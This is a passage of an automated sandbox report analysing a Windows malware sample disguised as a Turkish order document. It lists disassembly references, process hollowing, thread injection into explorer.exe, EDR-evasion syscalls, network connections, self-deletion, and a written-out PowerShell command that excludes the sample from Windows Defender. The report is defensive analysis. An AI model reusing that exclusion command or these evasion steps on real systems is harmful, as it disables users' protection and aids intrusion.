Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01200887 mov eax, dword ptr fs:[00000030h]	6_2_01200887
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0128C89D mov eax, dword ptr fs:[00000030h]	6_2_0128C89D
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012CA8E4 mov eax, dword ptr fs:[00000030h]	6_2_012CA8E4
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123C8F9 mov eax, dword ptr fs:[00000030h]	6_2_0123C8F9
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123C8F9 mov eax, dword ptr fs:[00000030h]	6_2_0123C8F9
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122E8C0 mov eax, dword ptr fs:[00000030h]	6_2_0122E8C0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012D08C0 mov eax, dword ptr fs:[00000030h]	6_2_012D08C0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122EB20 mov eax, dword ptr fs:[00000030h]	6_2_0122EB20
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122EB20 mov eax, dword ptr fs:[00000030h]	6_2_0122EB20
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012C8B28 mov eax, dword ptr fs:[00000030h]	6_2_012C8B28
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012C8B28 mov eax, dword ptr fs:[00000030h]	6_2_012C8B28
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012D4B00 mov eax, dword ptr fs:[00000030h]	6_2_012D4B00
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0127EB1D mov eax, dword ptr fs:[00000030h]	6_2_0127EB1D
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0127EB1D mov eax, dword ptr fs:[00000030h]	6_2_0127EB1D
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0127EB1D mov eax, dword ptr fs:[00000030h]	6_2_0127EB1D
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0127EB1D mov eax, dword ptr fs:[00000030h]	6_2_0127EB1D
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0127EB1D mov eax, dword ptr fs:[00000030h]	6_2_0127EB1D
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0127EB1D mov eax, dword ptr fs:[00000030h]	6_2_0127EB1D
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0127EB1D mov eax, dword ptr fs:[00000030h]	6_2_0127EB1D
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0127EB1D mov eax, dword ptr fs:[00000030h]	6_2_0127EB1D
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0127EB1D mov eax, dword ptr fs:[00000030h]	6_2_0127EB1D
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011F8B50 mov eax, dword ptr fs:[00000030h]	6_2_011F8B50
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012B4B4B mov eax, dword ptr fs:[00000030h]	6_2_012B4B4B
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012B4B4B mov eax, dword ptr fs:[00000030h]	6_2_012B4B4B
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011FCB7E mov eax, dword ptr fs:[00000030h]	6_2_011FCB7E
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012A8B42 mov eax, dword ptr fs:[00000030h]	6_2_012A8B42
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01296B40 mov eax, dword ptr fs:[00000030h]	6_2_01296B40
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01296B40 mov eax, dword ptr fs:[00000030h]	6_2_01296B40
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012CAB40 mov eax, dword ptr fs:[00000030h]	6_2_012CAB40
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012AEB50 mov eax, dword ptr fs:[00000030h]	6_2_012AEB50
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012D2B57 mov eax, dword ptr fs:[00000030h]	6_2_012D2B57
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012D2B57 mov eax, dword ptr fs:[00000030h]	6_2_012D2B57
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012D2B57 mov eax, dword ptr fs:[00000030h]	6_2_012D2B57
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012D2B57 mov eax, dword ptr fs:[00000030h]	6_2_012D2B57
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012B4BB0 mov eax, dword ptr fs:[00000030h]	6_2_012B4BB0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012B4BB0 mov eax, dword ptr fs:[00000030h]	6_2_012B4BB0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01210BBE mov eax, dword ptr fs:[00000030h]	6_2_01210BBE
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01210BBE mov eax, dword ptr fs:[00000030h]	6_2_01210BBE
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01208BF0 mov eax, dword ptr fs:[00000030h]	6_2_01208BF0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01208BF0 mov eax, dword ptr fs:[00000030h]	6_2_01208BF0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01208BF0 mov eax, dword ptr fs:[00000030h]	6_2_01208BF0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0128CBF0 mov eax, dword ptr fs:[00000030h]	6_2_0128CBF0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122EBFC mov eax, dword ptr fs:[00000030h]	6_2_0122EBFC
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01220BCB mov eax, dword ptr fs:[00000030h]	6_2_01220BCB
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01220BCB mov eax, dword ptr fs:[00000030h]	6_2_01220BCB
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01220BCB mov eax, dword ptr fs:[00000030h]	6_2_01220BCB
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01200BCD mov eax, dword ptr fs:[00000030h]	6_2_01200BCD
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01200BCD mov eax, dword ptr fs:[00000030h]	6_2_01200BCD
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01200BCD mov eax, dword ptr fs:[00000030h]	6_2_01200BCD
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012AEBD0 mov eax, dword ptr fs:[00000030h]	6_2_012AEBD0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123CA24 mov eax, dword ptr fs:[00000030h]	6_2_0123CA24
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122EA2E mov eax, dword ptr fs:[00000030h]	6_2_0122EA2E
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01224A35 mov eax, dword ptr fs:[00000030h]	6_2_01224A35
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01224A35 mov eax, dword ptr fs:[00000030h]	6_2_01224A35
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123CA38 mov eax, dword ptr fs:[00000030h]	6_2_0123CA38
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0128CA11 mov eax, dword ptr fs:[00000030h]	6_2_0128CA11
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012AEA60 mov eax, dword ptr fs:[00000030h]	6_2_012AEA60
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123CA6F mov eax, dword ptr fs:[00000030h]	6_2_0123CA6F
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123CA6F mov eax, dword ptr fs:[00000030h]	6_2_0123CA6F
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123CA6F mov eax, dword ptr fs:[00000030h]	6_2_0123CA6F
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0127CA72 mov eax, dword ptr fs:[00000030h]	6_2_0127CA72
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0127CA72 mov eax, dword ptr fs:[00000030h]	6_2_0127CA72
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01206A50 mov eax, dword ptr fs:[00000030h]	6_2_01206A50
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01206A50 mov eax, dword ptr fs:[00000030h]	6_2_01206A50
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01206A50 mov eax, dword ptr fs:[00000030h]	6_2_01206A50
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01206A50 mov eax, dword ptr fs:[00000030h]	6_2_01206A50
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01206A50 mov eax, dword ptr fs:[00000030h]	6_2_01206A50
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01206A50 mov eax, dword ptr fs:[00000030h]	6_2_01206A50
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01206A50 mov eax, dword ptr fs:[00000030h]	6_2_01206A50
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01210A5B mov eax, dword ptr fs:[00000030h]	6_2_01210A5B
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01210A5B mov eax, dword ptr fs:[00000030h]	6_2_01210A5B
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01208AA0 mov eax, dword ptr fs:[00000030h]	6_2_01208AA0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01208AA0 mov eax, dword ptr fs:[00000030h]	6_2_01208AA0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01256AA4 mov eax, dword ptr fs:[00000030h]	6_2_01256AA4
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120EA80 mov eax, dword ptr fs:[00000030h]	6_2_0120EA80
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120EA80 mov eax, dword ptr fs:[00000030h]	6_2_0120EA80
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120EA80 mov eax, dword ptr fs:[00000030h]	6_2_0120EA80
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120EA80 mov eax, dword ptr fs:[00000030h]	6_2_0120EA80
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120EA80 mov eax, dword ptr fs:[00000030h]	6_2_0120EA80
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120EA80 mov eax, dword ptr fs:[00000030h]	6_2_0120EA80
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120EA80 mov eax, dword ptr fs:[00000030h]	6_2_0120EA80
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120EA80 mov eax, dword ptr fs:[00000030h]	6_2_0120EA80

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 8_2_0079DC60 GetProcessHeap,RtlFreeHeap,

8_2_0079DC60

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007A6EC0 SetUnhandledExceptionFilter,		8_2_007A6EC0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007A6B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		8_2_007A6B40

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe

Memory allocated: page read and write | page guard

System process connects to network (likely due to code injection or exploit)

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe	Network Connect: 207.241.198.3 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 108.157.194.11 80			Jump to behavior

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe"
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe"			Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	NtQueueApcThread: Indirect: 0x117A4F2			Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	NtClose: Indirect: 0x117A56C

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe

Memory written: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe base: 400000 value starts with: 4D5A

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Thread register set: target process: 1028			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Thread register set: target process: 1028			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe

Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: 790000

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process created: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe "C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process created: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe "C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe"	Jump to behavior

Source: explorer.exe, 00000007.00000003.3105365605.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094747325.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2144614594.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000007.00000002.4539768932.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2132455186.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000007.00000000.2135190093.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4539768932.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2132455186.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000002.4539768932.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2132455186.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000007.00000002.4539768932.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2132455186.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000007.00000002.4538762767.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2131821278.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PProgman

Source: C:\Windows\SysWOW64\cmd.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,	8_2_00796854
Source: C:\Windows\SysWOW64\cmd.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	8_2_00798572
Source: C:\Windows\SysWOW64\cmd.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	8_2_00799310

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Queries volume information: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
